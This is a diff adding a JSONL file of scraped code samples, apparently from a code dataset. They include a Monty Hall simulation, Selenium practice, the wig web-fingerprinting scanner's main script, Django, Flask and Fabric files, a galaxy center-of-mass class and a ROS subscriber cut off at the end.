diff --git "a/4343.jsonl" "b/4343.jsonl" new file mode 100644--- /dev/null +++ "b/4343.jsonl" @@ -0,0 +1,691 @@ +{"seq_id":"120383011","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 29 09:57:54 2020\n\n@author: jcantero\n\"\"\"\n\nfrom doors_factory import DoorsFactory\nfrom competitor import Competitor\nfrom presenter import Presenter \nfrom doors_cache import DoorsCache\n\nN = 10000\nwithDoorChange = [True, False]\n\nfor witchChange in withDoorChange:\n countWin = 0\n for i in range (0, N):\n doorsCache = DoorsCache(DoorsFactory.build())\n Competitor.chooseDoor(doorsCache.getDoors())\n Presenter.openDoor(doorsCache.getDoorsWithoutPrizeAndNotSelected())\n\n #print(doorsCache.getDoors())\n if witchChange:\n Competitor.changeDoor(doorsCache.getDoorsNotOpened())\n #print(doorsCache.getDoors())\n\n if (doorsCache.getDoorSelected().havePrize()):\n countWin = countWin +1\n\n print(f\"El numero de aciertos es {countWin} sobre {N} intentos con cambio a {witchChange}\")\n","sub_path":"Tareas/MontyHallProblem/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"209479982","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.select import Select\n\noptions = webdriver.ChromeOptions()\noptions.add_extension('c:/chromedriver_win32/extension_6_1_7_0.crx')\ndriver = webdriver.Chrome(executable_path=\"c:\\\\chromedriver_win32\\\\chromedriver.exe\", options=options)\n\n# driver = webdriver.Chrome(chrome_options=options)\n\ndriver.get(\"https://rahulshettyacademy.com/angularpractice/\")\n\n# driver.find_element_by_name(\"name\").send_keys(\"Archana\")\ndriver.find_element_by_css_selector(\"input[name='name']\").send_keys(\"Archana\")\ndriver.find_element_by_name(\"email\").send_keys(\"Kumari\")\n\n# driver.findElementByName().send_keys -send_keys (write in Java)\ndriver.find_element_by_id(\"exampleCheck1\").click()\n\n# select class provide the methods to handle the options in dropdown\ndropdown = Select(driver.find_element_by_id(\"exampleFormControlSelect1\"))\ndropdown.select_by_visible_text(\"Female\")\ndropdown.select_by_index(0)\n# dropdown.select_by_value(\"M\")\n\ndriver.find_element_by_xpath(\"//input[@type='submit']\").click()\n# print(driver.find_element_by_class_name(\"alert-success\").text)\n# //*[contains(@class,'alert-success')] - XPath\n# [class*='alert-success'] - CSS\n# //input[@class='btn btn-success']\nmessage = driver.find_element_by_class_name(\"alert-success\").text\nassert \"success\" in message","sub_path":"PythonSelenium/locators.py","file_name":"locators.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"327608650","text":"#!/usr/bin/env python3\nimport json, pprint, os, time, queue, sys\nimport argparse\nfrom collections import defaultdict, Counter\n\nfrom classes.color import Color\nfrom classes.cache import Cache\nfrom classes.results import Results\nfrom classes.fingerprints import Fingerprints\nfrom classes.discovery import DiscoverTitle, DiscoverIP, DiscoverCookies\nfrom classes.discovery import DiscoverCMS, DiscoverVersion\nfrom classes.discovery import DiscoverOS, DiscoverJavaScript, DiscoverAllCMS\nfrom classes.discovery import DiscoverErrorPage, DiscoverMore\nfrom classes.discovery import DiscoverInteresting, DiscoverUrlLess\nfrom classes.discovery import 
DiscoverVulnerabilities, DiscoverTools\nfrom classes.headers import ExtractHeaders\nfrom classes.matcher import Match\nfrom classes.printer import Printer\nfrom classes.output import Output\nfrom classes.request2 import Requester, UnknownHostName\n\n\n\n\nclass Wig(object):\n\n\tdef __init__(self, args):\n\n\t\tself.options = {\n\t\t\t'url': args.url,\n\t\t\t'prefix': '',\n\t\t\t'user_agent': args.user_agent,\n\t\t\t'proxy': args.proxy,\n\t\t\t'verbosity': args.verbosity,\n\t\t\t'threads': 10,\n\t\t\t'chunk_size': 10, # same as threads\n\t\t\t'run_all': args.run_all,\n\t\t\t'match_all': args.match_all,\n\t\t\t'stop_after': args.stop_after,\n\t\t\t'no_cache_load': args.no_cache_load,\n\t\t\t'no_cache_save': args.no_cache_save,\n\t\t}\n\n\t\tself.data = {\n\t\t\t'cache': Cache(),\n\t\t\t'results': Results(self.options),\n\t\t\t'fingerprints': Fingerprints(),\n\t\t\t'matcher': Match(),\n\t\t\t'colorizer': Color(),\n\t\t\t'printer': Printer(args.verbosity, Color()),\n\t\t\t'detected_cms': set(),\n\t\t\t'error_pages': set(),\n\t\t\t'queue': queue.Queue(),\n\t\t\t'requested': queue.Queue()\n\t\t}\n\n\t\tself.data['results'].set_printer(self.data['printer'])\n\t\tself.data['requester'] = Requester(self.options, self.data)\n\n\tdef run(self):\n\t\t\n\t\t########################################################################\n\t\t# PRE PROCESSING\n\t\t########################################################################\n\t\t\n\t\ttry:\n\t\t\tis_redirected, new_url = self.data['requester'].detect_redirect()\n\t\texcept UnknownHostName as e:\n\t\t\terror = self.data['colorizer'].format(e, 'red', False)\n\t\t\tprint(error)\n\t\t\tsys.exit(1)\n\n\n\t\tif is_redirected:\n\t\t\thilight_host = self.data['colorizer'].format(new_url, 'red', False)\n\t\t\tchoice = input(\"Redirected to %s. Continue? [Y|n]:\" % (hilight_host,))\n\n\t\t\t# if not, exit\n\t\t\tif choice in ['n', 'N']:\n\t\t\t\tsys.exit(1)\n\t\t\t# else update the host\n\t\t\telse:\n\t\t\t\tself.options['url'] = new_url\n\t\t\t\tself.data['requester'].set_url(new_url)\n\n\t\t# timer started after the user interaction\n\t\tself.data['timer'] = time.time()\n\n\t\t# load cache if this is not disabled\n\t\tself.data['cache'].set_host(self.options['url'])\n\t\tif not self.options['no_cache_load']:\n\t\t\tself.data['cache'].load()\n\n\t\t# find error pages\n\t\tself.data['error_pages'] = DiscoverErrorPage(self.options, self.data).run()\n\n\t\t# create a matcher\n\t\tself.data['matcher'].set_404s(self.data['error_pages'])\n\n\t\tip = DiscoverIP(self.options['url']).run()\n\t\tself.data['results'].set_ip(ip)\n\n\t\t########################################################################\n\t\t# PROCESSING\n\t\t########################################################################\n\t\tcms_finder = DiscoverCMS(self.options, self.data)\n\t\tversion_finder = DiscoverVersion(self.options, self.data)\n\t\tp = self.data['printer']\n\n\t\t# as long as there are more fingerprints to check, and\n\t\t# no cms' have been detected\n\t\tcounter = 0\n\t\tp.print('Running CMS detection...' 
,1)\n\t\twhile not cms_finder.is_done() and (len(self.data['detected_cms']) < self.options['stop_after'] or self.options['run_all']):\n\t\t\tcounter += 1\n\n\t\t\t# check the next chunk of urls for cms detection\n\t\t\tcms_list = list(set(cms_finder.run()))\n\t\t\tfor cms in cms_list:\n\t\t\t\t\n\t\t\t\t# skip checking the cms, if it has already been detected\n\t\t\t\tif cms in self.data['detected_cms']: continue\n\n\t\t\t\tp.print('- Running CMS version detection on %s' % (cms, ) ,2)\n\t\t\t\tversion_finder.run(cms)\n\n\t\t\t\t# if a match was found, then it has been added to the results object\n\t\t\t\t# and the detected_cms list should be updated\n\t\t\t\tif self.data['results'].found_match(cms):\n\t\t\t\t\tself.data['detected_cms'].add(cms)\n\t\t\t\telse:\n\t\t\t\t\tpass\n\n\t\t########################################################################\n\t\t# POST PROCESSING\n\t\t########################################################################\n\n\t\t# set site into\n\t\tip = DiscoverIP(self.options['url']).run()\n\t\tself.data['results'].set_ip(ip)\n\t\ttitle = DiscoverTitle(self.options, self.data).run()\n\t\tself.data['results'].set_title(title)\n\n\t\t# find interesting files\n\t\tDiscoverInteresting(self.options, self.data).run()\n\t\tDiscoverMore(self.options, self.data).run()\n\t\tExtractHeaders(self.data).run()\n\t\tDiscoverJavaScript(self.options, self.data).run()\n\t\tDiscoverUrlLess(self.options, self.data).run()\n\t\t\n\t\tif self.options['match_all']:\n\t\t\tDiscoverAllCMS(self.data).run()\n\n\t\tDiscoverOS(self.options, self.data).run()\n\n\t\tcookies = DiscoverCookies(self.data).run()\n\t\tself.data['results'].set_cookies(cookies)\n\n\t\tDiscoverVulnerabilities(self.data).run()\n\n\t\tif not self.options['no_cache_save']:\n\t\t\tself.data['cache'].save()\n\t\n\t\t########################################################################\n\t\t# RESULT PRINTING\n\t\t########################################################################\n\t\tself.data['runtime'] = time.time() - self.data['timer']\n\t\tself.data['url_count'] = self.data['cache'].get_num_urls()\n\n\t\toutputter = Output(self.options, self.data)\n\t\tprint(outputter.get_results())\n\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser(description='WebApp Information Gatherer')\n\tparser.add_argument('url', type=str, help='The url to scan e.g. http://example.com')\n\t\n\tparser.add_argument('-n', type=int, default=1, dest=\"stop_after\",\n\t\t\t\t\t\thelp='Stop after this amount of CMSs have been detected. 
Default: 1')\n\t\n\tparser.add_argument('-a', action='store_true', dest='run_all', default=False,\n\t\t\t\t\t\thelp='Do not stop after the first CMS is detected')\n\n\tparser.add_argument('-m', action='store_true', dest='match_all', default=False,\n\t\t\t\t\t\thelp='Try harder to find a match without making more requests')\n\n\tparser.add_argument('-u', action='store_true', dest='user_agent', \n\t\t\t\t\t\tdefault='Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',\n\t\t\t\t\t\thelp='User-agent to use in the requests')\t\n\n\tparser.add_argument('--no_cache_load', action='store_true', default=False,\n\t\t\t\t\t\thelp='Do not load cached responses')\n\n\tparser.add_argument('--no_cache_save', action='store_true', default=False,\n\t\t\t\t\t\thelp='Do not save the cache for later use')\n\n\tparser.add_argument('-N', action='store_true', dest='no_cache', default=False,\n\t\t\t\t\t\thelp='Shortcut for --no_cache_load and --no_cache_save')\n\n\tparser.add_argument('--verbosity', '-v', action='count', default=0,\n\t\t\t\t\t\thelp='Increase verbosity. Use multiple times for more info')\n\n\tparser.add_argument('--proxy', dest='proxy', default=None, \n\t\t\t\t\t\thelp='Tunnel through a proxy (format: localhost:8080)')\n\n\n\targs = parser.parse_args()\n\n\tif '://' not in args.url:\n\t\targs.url = 'http://' + args.url\n\n\tif args.no_cache:\n\t\targs.no_cache_load = True\n\t\targs.no_cache_save = True\n\n\ttry:\n\t\ttitle = \"\"\"\ndP dP dP dP .88888. \n88 88 88 88 d8' `88 \n88 .8P .8P 88 88 \n88 d8' d8' 88 88 YP88 \n88.d8P8.d8P 88 Y8. .88 \n8888' Y88' dP `88888' \n\n WebApp Information Gatherer\n\"\"\"\n\t\tprint(title)\n\t\twig = Wig(args)\n\t\twig.run()\n\texcept KeyboardInterrupt:\n\t\t# detect ctrl+c\n\t\tfor w in wig.workers:\n\t\t\tw.kill = True\n\t\traise\n","sub_path":"wig.py","file_name":"wig.py","file_ext":"py","file_size_in_byte":7543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"380439969","text":"from django.conf.urls import patterns, url\n\nfrom dog import views\n\n# each url pattern is mapped to a function in dog/views.py\n# and is referenced by dog:(name=) i.e. 
dogs:index\n# comments preceding a url pattern indicate an example of what the url will appear like\n\nurlpatterns = patterns('',\n #/dog/\n url(r'^$', views.index, name='index'),\n # ex: /dog/5/\n url(r'^(?P<dog_id>\\d+)/$', views.detail, name='detail'),\n # ex: /dog/5/add/\n url(r'^add/$', views.add, name='add'),\n # ex: /dog/5/delete/\n url(r'^(?P<dog_id>\\d+)/delete/$', views.delete, name='delete'),\n # ex: /dog/5/update/\n url(r'^(?P<dog_id>\\d+)/update/$', views.update, name='update'),\n# url(r'^(?P<dog_id>\\d+)/chart/(?P<criteria_id>\\d+)/$', views.chart_criteria, name='chart'),\n# url(r'^(?P<dog_id>\\d+)/chart/$', views.chart_base, name='chartbase'),\n # ex: csv/\n url(r'^csv/$', views.export_csv, name='export_csv'),\n # ex: /dog/5/assignskill/\n url(r'^(?P<dog_id>\\d+)/assignskill/$', views.assign_skill, name='assignskill'),\n # ex: /dog/5/assigntrainer/\n url(r'^(?P<dog_id>\\d+)/assigntrainer/$', views.assign_trainer, name='assigntrainer')\n)\n","sub_path":"dog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"456013808","text":"\nimport pygame, os, sys, math, random\n\nfrom queue import PriorityQueue\nfrom lib.actors.hero import Hero\nfrom lib.animations.animation import Animation\nSCREEN_SIZE = (640, 480)\nFPS_CLOCK = pygame.time.Clock()\n\n\nlocal_dir = os.path.dirname(__file__)\n\ndef local_file(path):\n return os.path.join(local_dir, path)\n\ndef load_image(file_name):\n lfile = local_file(file_name)\n print(lfile)\n return pygame.image.load(lfile)\n\nif __name__ == \"__main__\":\n \n \"\"\"\n Actor\n - controller component\n -- AI (finite state machine)\n -- User controller\n \n Actor -> Hero\n Actor -> Enemy\n\n \"\"\"\n\n \"\"\"\n Game Play\n\n - Actions\n -- Use/Item\n -- Attack\n -- Walk\n -- LOS\n -- Toss /Throw\n\n \"\"\"\n\n \"\"\"\n Item System\n\n - Items\n -- consumable\n -- durable/multi-use\n - Weapons\n -- short range\n -- long range (use toss action)\n -- magic??\n - Armor\n --\n\n \"\"\"\n\n \"\"\"\n game loops\n\n -- animation\n -- movement\n -- player controls\n -- attacks\n -- physics\n -- rendering\n\n \"\"\"\n\n pygame.init()\n\n surface = pygame.display.set_mode(SCREEN_SIZE)\n last_millis = 0 \n\n sx = -50 + random.random() * 100\n sy = -50 + random.random() * 100\n entities = []\n hero_animation = Animation(local_file('src/assets/images/cloakandleather.png'), random.randint(0, 1), 2, (sx, sy))\n \n hero = Hero(SCREEN_SIZE[0]/2, SCREEN_SIZE[1]/2, hero_animation)\n\n entities.append(hero)\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n delta_time = last_millis / 1000\n\n for entity in entities:\n entity.update(delta_time)\n\n surface.fill((0, 0, 0))\n\n for entity in entities:\n entity.draw(surface)\n\n pygame.display.update()\n\n last_millis = FPS_CLOCK.tick(30)
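\n # Note (descriptive comment added for clarity): Clock.tick(30) caps the\n # loop at ~30 FPS and returns the milliseconds spent on the previous\n # frame; delta_time above converts that duration to seconds for update().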
","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"154815005","text":"import sys\nimport os\nfrom pathlib import Path\nimport subprocess\n\n# 0_script 1_list_of_files_of_configs 2_location_of_config_files 3_executable_location 4_output_logs_directory\n# SAMPLE: execute_list_of_files.py mkp_testing_list_config_files.txt ./ ./ \nprint (\"Number of arguments: %d\" % len(sys.argv))\nprint (\"Argument List: %s\" % str(sys.argv))\n\nlog_file = open(\"execute.log\", \"w\")\n\n# read through the file and run them \nwith open(sys.argv[1],\"r\") as f:\n for line in f:\n filename, file_extension = os.path.splitext(line)\n\n execution = sys.argv[3] + \" -c \" + sys.argv[2] + line.rstrip() + \" -t \" + sys.argv[4] + filename + \".test_out\" \n print(\"Execution: %s\" % execution)\n\n p = subprocess.call([sys.argv[3], \"-c\", sys.argv[2]+line.rstrip(), \"-t\", sys.argv[4]+filename+\".test_out\"], stdout=log_file, stderr=log_file)\n \nlog_file.close()\n\n","sub_path":"GA_lapagos/SCRIPTS/execute_list_of_files.py","file_name":"execute_list_of_files.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"312645033","text":"from flask import Flask\nimport base64\nimport json\nimport re\nimport requests\nimport sys\nimport yaml\n\napp = Flask(__name__)\n__argument__ = None\n\n\n@app.route('/v1/<path:path>', methods=['GET'])\ndef hello(path):\n if __argument__ == '--help':\n return 'Provide the git repo path'\n else:\n url = __argument__\n regex = r\"https://github.com/([^/].*)/([^/].*)\"\n (user, repo) = re.match(regex, url).groups()\n response = requests.get('https://api.github.com/repos/' + user\n + '/' + repo + '/contents/' + path)\n if response:\n data = json.loads(response.text)\n content = base64.b64decode(data['content']).decode('utf-8')\n if '.yml' in data['name']:\n welcome_message = \\\n yaml.safe_load(content).get('welcome_message', None)\n yaml_response = {}\n yaml_response['welcome_message'] = welcome_message\n if welcome_message:\n return yaml.dump(yaml_response)\n else:\n return 'No welcome_message in the config'\n elif '.json' in data['name']:\n welcome_message = \\\n json.loads(content).get('welcome_message', None)\n json_response = {}\n json_response['welcome_message'] = welcome_message\n if welcome_message:\n return json.dumps(json_response, indent=4,\n separators=(',', ': '))\n else:\n return 'No welcome_message in the config'\n else:\n return 'Unsupported config format, please use yml or json'\n else:\n\n return 'Error in fetching from repo: ' + response.text\n\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n __argument__ = sys.argv[1]\n app.run(debug=True, host='0.0.0.0')\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"484135977","text":"# Homework 4 Solutions\n# Center of Mass Position and Velocity\n# G. 
Besla\n\n# Homework 6 : modified to take in a different value with which to \n# decrease the volume.\n\n\n# import modules\nimport numpy as np\nimport astropy.units as u\n#from ReadFile import Read -- 24/07/20 Included the content in this file.\n\n# Define a function that reads in the data file\n# USAGE : time, total, data = Read(\"filename\")\ndef Read(filename):\n\n # open the file \n file = open(filename,'r')\n \n #read header info line by line (line will be a string)\n # read first two lines FIRST and store as variable\n \n # read in first line and store time\n line1 = file.readline()\n label, value = line1.split()\n time = float(value)*u.Myr\n\n # read in 2nd line and store total number of particles\n line2 = file.readline()\n label, value = line2.split()\n total = float(value)\n \n # close file\n file.close()\n \n # read the remainder of the file, \n # \"dtype=None\" means line is split using white spaces\n # \"skip_header=3\" skipping the first 3 lines \n # the flag \"names=True\" creates arrays to store the date\n # with the column headers given in line 4 like \"m\", \"x\"\n data = np.genfromtxt(filename,dtype=None,names=True,skip_header=3)\n \n # return the time of the snapshot, \n # total number of particles \n #and an array that stores the remainder of the data. \n return time, total, data\n\n\nclass CenterOfMass:\n \n def __init__(self, filename, ptype):\n # read in the file \n self.time, self.total, self.data = Read(filename)\n #print(self.time)\n \n #create an array to store indexes of particles of desired Ptype\n self.index = np.where(self.data['type'] == ptype)\n \n # store the mass, positions, velocities of only the particles of the given type\n self.m = self.data['m'][self.index]\n self.x = self.data['x'][self.index]\n self.y = self.data['y'][self.index]\n self.z = self.data['z'][self.index]\n self.vx = self.data['vx'][self.index]\n self.vy = self.data['vy'][self.index]\n self.vz = self.data['vz'][self.index]\n\n \n \n def COMdefine(self,a,b,c,m):\n # Function to compute the center of mass position or velocity generically\n # input: array (a,b,c) of positions or velocities and the mass\n # returns: 3 floats (the center of mass coordinates)\n \n # note: since all particles have the same\n # mass when consider only one type\n # the below is equivalently np.sum(x)/len(x)\n\n # xcomponent Center of mass \n Acom = np.sum(a*m)/np.sum(m)\n # ycomponent Center of mass\n Bcom = np.sum(b*m)/np.sum(m)\n # zcomponent\n Ccom = np.sum(c*m)/np.sum(m)\n\n return Acom, Bcom, Ccom\n\n \n def COM_P(self, delta, VolDec):\n # Function to specifically return the center of mass position and velocity\n # input: \n # delta (tolerance)\n # VolDec (value with which to decrease RMAX)\n # returns: One vector, with rows indicating:\n # 3D coordinates of the center of mass position (kpc), \n # 3D velocity vector of the center of mass (km/s)\n\n \n\n # Center of Mass Position\n ###########################\n\n # Try a first guess at the COM position by calling COMdefine\n XCOM, YCOM, ZCOM = self.COMdefine(self.x,self.y,self.z,self.m)\n # compute the magnitude of the COM position vector. 
\n RCOM = np.sqrt(XCOM**2 + YCOM**2 + ZCOM**2)\n # print('init R', RCOM)\n\n \n # iterative process to determine the center of mass\n \n # change reference frame to COM frame\n # compute the difference between particle coordinates\n # and the first guess at COM position \n xNew = self.x - XCOM\n yNew = self.y - YCOM\n zNew = self.z - ZCOM\n RNEW = np.sqrt(xNew**2.0 + yNew**2.0 +zNew**2.0)\n \n # find the max 3D distance of all particles from the guessed COM\n # will re-start at a reduced radius specified by input VolDec\n RMAX = np.max(RNEW)/VolDec\n\n # pick an initial estimate for the change in COM position \n # between the first guess above and the new one computed from half that volume.\n CHANGE = 1000.0\n \n # start iterative process to determine center of mass position\n # delta is the tolerance for the difference in the old COM and the new one.\n while (CHANGE > delta):\n \n # select all particles within the reduced radius (starting from original x,y,z, m)\n index2 = np.where(RNEW < RMAX)\n x2 = self.x[index2]\n y2 = self.y[index2]\n z2 = self.z[index2]\n m2 = self.m[index2]\n \n # Refined COM position:\n # compute the center of mass position using \n # the particles in the reduced radius\n XCOM2, YCOM2, ZCOM2 = self.COMdefine(x2,y2,z2,m2)\n # compute the new 3D COM position\n RCOM2 = np.sqrt(XCOM2**2 + YCOM2**2 + ZCOM2**2)\n\n # determine the difference between the previous center of mass position \n # and the new one. \n CHANGE = np.abs(RCOM - RCOM2)\n # check this\n # print (\"DIFF\", diff)\n \n # Before loop continues, reset : RMAX, particle separations and COM\n \n # reduce the volume by specified decrement again\n RMAX = RMAX/VolDec\n # check this.\n #print (\"maxR\", maxR)\n \n \n # Change the frame of reference to the newly computed COM.\n # subtract the new COM\n xNew = self.x - XCOM2\n yNew = self.y - YCOM2\n zNew = self.z - ZCOM2\n RNEW = np.sqrt(xNew**2 + yNew**2 + zNew**2)\n \n \n \n # set the center of mass positions to the refined values\n XCOM = XCOM2\n YCOM = YCOM2\n ZCOM = ZCOM2\n RCOM = RCOM2\n \n # create a vector to store the COM position \n # set the correct units usint astropy \n # round all values\n COMP = [np.round((XCOM)*u.kpc), np.round((YCOM)*u.kpc), np.round((ZCOM)*u.kpc)]\n \n # return the COM positon vector\n return COMP\n \n \n def COM_V(self, COMX,COMY,COMZ):\n # Center of Mass velocity\n # input: X, Y, Z positions of the COM\n # returns 3D Vector of COM Velocities\n \n # the max distance from the center that we will use to determine the center of mass velocity \n RVMAX = 15.0*u.kpc\n\n # determine the position of all particles relative to the center of mass position \n xV = self.x[:]*u.kpc - COMX\n yV = self.y[:]*u.kpc - COMY\n zV = self.z[:]*u.kpc - COMZ\n RV = np.sqrt(xV**2 + yV**2 + zV**2)\n \n # determine the index for those particles within the max radius\n indexV = np.where(RV < RVMAX)\n \n # determine the velocity and mass of those particles within the mas radius\n vxnew = self.vx[indexV]\n vynew = self.vy[indexV]\n vznew = self.vz[indexV]\n mnew = self.m[indexV]\n \n # compute the center of mass velocity using those particles\n VXCOM, VYCOM, VZCOM = self.COMdefine(vxnew,vynew,vznew, mnew)\n\n # create a vector to store the COM velocity\n # set the correct units usint astropy \n # round all values\n COMV = [np.round((VXCOM)*u.km/u.s), np.round((VYCOM)*u.km/u.s), np.round((VZCOM)*u.km/u.s)]\n \n # return the COM vector\n return COMV\n 
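\n # Example usage (illustrative comment added; \"snapshot.txt\" and the\n # particle type are hypothetical, not from the original assignment):\n # com = CenterOfMass(\"snapshot.txt\", 2)\n # com_p = com.COM_P(0.1, 2.0) # tolerance, volume-decrease factor\n # com_v = com.COM_V(com_p[0], com_p[1], com_p[2])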
\n\n\n","sub_path":"06_EPO/e-TeenAstronomyCafe/04_Galactic_Neighborhood/CenterOfMass.py","file_name":"CenterOfMass.py","file_ext":"py","file_size_in_byte":7687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"215289569","text":"arquivo = open(\"numero.txt\",\"r\")\n\nlista1 = []\nlista2 = []\nlista3 = []\nlista4 = []\n\nfor linha in arquivo.readlines():\n s = linha\n lista1.append(int(s.split(\";\")[0]))\n lista2.append(s.split(\";\")[1])\n lista3.append(s.split(\";\")[2])\n lista4.append(s.split(\";\")[3])\n\narquivo.close()\n\nprint(lista1)\nlista1[0]+=1000\nprint(lista1)","sub_path":"Arquivos.py","file_name":"Arquivos.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"456215749","text":"from table import *\nfrom utils import *\n\n\ndef main():\n print(\"-------- Exercise 1 ---------\")\n print(\"- Using the tf-idf approach to summarize an english textual document\")\n print(\"<<< Summary of data/ex1.txt is >>>\")\n directory = 'data/'\n tab = Table(['ex1.txt'], parse_sentences=True, language='english', path=directory)\n with open(directory+'ex1.txt', 'r', encoding='latin1') as file:\n doc = file.read()\n result = summary(doc, tab, 3)\n for sentence in result:\n print(sentence)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"p1_ex1.py","file_name":"p1_ex1.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"294188953","text":"# -*- coding: utf-8 -*-\n\n##################\n# SETTINGS SETUP #\n##################\n\nimport StringIO\nimport re\n\nfrom os.path import abspath\nfrom os.path import dirname\nfrom os.path import basename\nfrom os.path import join\n\nfrom fabric.contrib.files import exists\nfrom fabric.api import env\nfrom fabric.api import task\nfrom fabric.api import get\nfrom fabric.api import put\nfrom fabric.api import run\n\nfrom decouple import AutoConfig\nfrom decouple import config\n\nfrom .managers import project\n\n\ndef set_environ(config):\n\n env.ROLE = env.get('env')\n env.roledefs[env.ROLE] = [config('{ROLE}_HOST', 'localhost')]\n\n env.host_string = env.roledefs[env.ROLE][0]\n env.HOME = config('HOME')\n\n env.GIT = config('REPO', '')\n env.BRANCH = config(env.ROLE.upper() + '_BRANCH', '')\n\n env.PROJECT_BASE = abspath(dirname(dirname(__file__)))\n env.PROJECT_NAME = basename(env.PROJECT_BASE)\n env.STATIC_PATH = config('STATIC_PATH', join(env.PROJECT_BASE, 'frontend'))\n\n env.CONFIG_PATH = join(env.PROJECT_BASE, 'config')\n env.ENV_FILE = join(env.CONFIG_PATH, 'env.{ROLE}'.format(**env).lower())\n\n env.VENV_HOME = join(env.HOME, '.virtualenvs')\n env.VENV_PATH = join(env.VENV_HOME, env.PROJECT_NAME)\n\n url = config('DB_URL', '')\n if url:\n url = re.sub('.*://', '', url)\n url = re.sub('@.*/', ':', url)\n env.DB_ROLE = url.split(':')[0]\n env.DB_PWD = url.split(':')[1]\n env.DB_NAME = url.split(':')[2]\n\n\n@task\ndef setup_env():\n with project():\n if not exists('.env'):\n config = AutoConfig()\n run('cp {ENV_FILE} .env'.format(**env))\n set_environ(config)\n\n if env.ROLE != 'local':\n config = AutoConfig()\n env_file = run('cat .env')\n environ_file = run('cat {ENV_FILE}'.format(**env))\n if env_file != environ_file:\n prompt = input(\"\\nFoi identificado uma mudanca no .env\"\n \"\\ndeseja atualizar? 
(yes/no) \".format(**env))\n\n if prompt.lower() == 'yes':\n env_vars = StringIO()\n get(env.environ_file, local_path=env_vars)\n env_vars.seek(0)\n put(env_vars, '.env')\n set_environ(config)\n\n\nset_environ(config)\nif not exists(join(env.PROJECT_BASE, '.env')):\n setup_env()\n","sub_path":"fabfile/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"61348430","text":"\n# Standard\nimport datetime\nimport logging\n\n# Third Party\nfrom django.core.management.base import BaseCommand\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.template.loader import get_template\nfrom django.template import Context\nfrom dateutil import relativedelta\n\n# Local\nfrom tasks.models import Task, Claim, Nag, Worker, Work\n\n__author__ = 'adrian'\n\nVC_EMAIL = \"Volunteer Coordinator \"\nXIS_EMAIL = \"Xerocraft Internal Systems \"\n\nclass Command(BaseCommand):\n\n help = \"If work MTD doesn't match figure last reported, send worker and email with updated info.\"\n\n @staticmethod\n def send_report(member, work_list, total_dur):\n\n total_hrs = total_dur.total_seconds()/3600.0\n next_month = datetime.date.today() + relativedelta.relativedelta(months=1)\n next_month = next_month.strftime(\"%B\")\n\n text_content_template = get_template('tasks/email_wmtd_template.txt')\n html_content_template = get_template('tasks/email_wmtd_template.html')\n d = Context({\n 'member': member,\n 'work_list': work_list,\n 'total_dur': total_dur,\n 'total_hrs': total_hrs,\n 'next_month': next_month,\n })\n subject = 'Work Trade Report, ' + datetime.date.today().strftime('%a %b %d')\n from_email = VC_EMAIL\n bcc_email = XIS_EMAIL\n to = member.email\n text_content = text_content_template.render(d)\n html_content = html_content_template.render(d)\n msg = EmailMultiAlternatives(subject, text_content, from_email, [to], [bcc_email])\n msg.attach_alternative(html_content, \"text/html\")\n msg.send()\n\n def handle(self, *args, **options):\n work_lists = {}\n\n logger = logging.getLogger(\"tasks\")\n\n # Process this month's work entries, gathering them by member:\n today = datetime.date.today()\n start_of_month = datetime.datetime(today.year, today.month, 1)\n for work in Work.objects.filter(work_date__gte=start_of_month):\n member = work.claim.claiming_member\n if member not in work_lists: work_lists[member] = []\n work_lists[member] += [work]\n\n # Look for work lists with totals that have changed since last report:\n for member, work_list in work_lists.items():\n\n if not member.worker.should_report_work_mtd: continue\n if member.email == \"\": continue\n\n total_wmtd = datetime.timedelta(0)\n for work in work_list:\n total_wmtd += work.work_duration\n if total_wmtd != member.worker.last_work_mtd_reported:\n logger.info(\"Sent email to %s regarding WMTD = %s\", member, total_wmtd)\n Command.send_report(member, work_list, total_wmtd)\n member.worker.last_work_mtd_reported = total_wmtd\n member.worker.save()\n\n","sub_path":"tasks/management/commands/emailwmtd.py","file_name":"emailwmtd.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"37406729","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import String\nglobal n1_str\nglobal n2_str\ndef callback1(data):\n n1_str=data.data\n print(n1_str, end='')\ndef callback2(data):\n n2_str=data.data\n print(\":\",n2_str)\n\ndef 
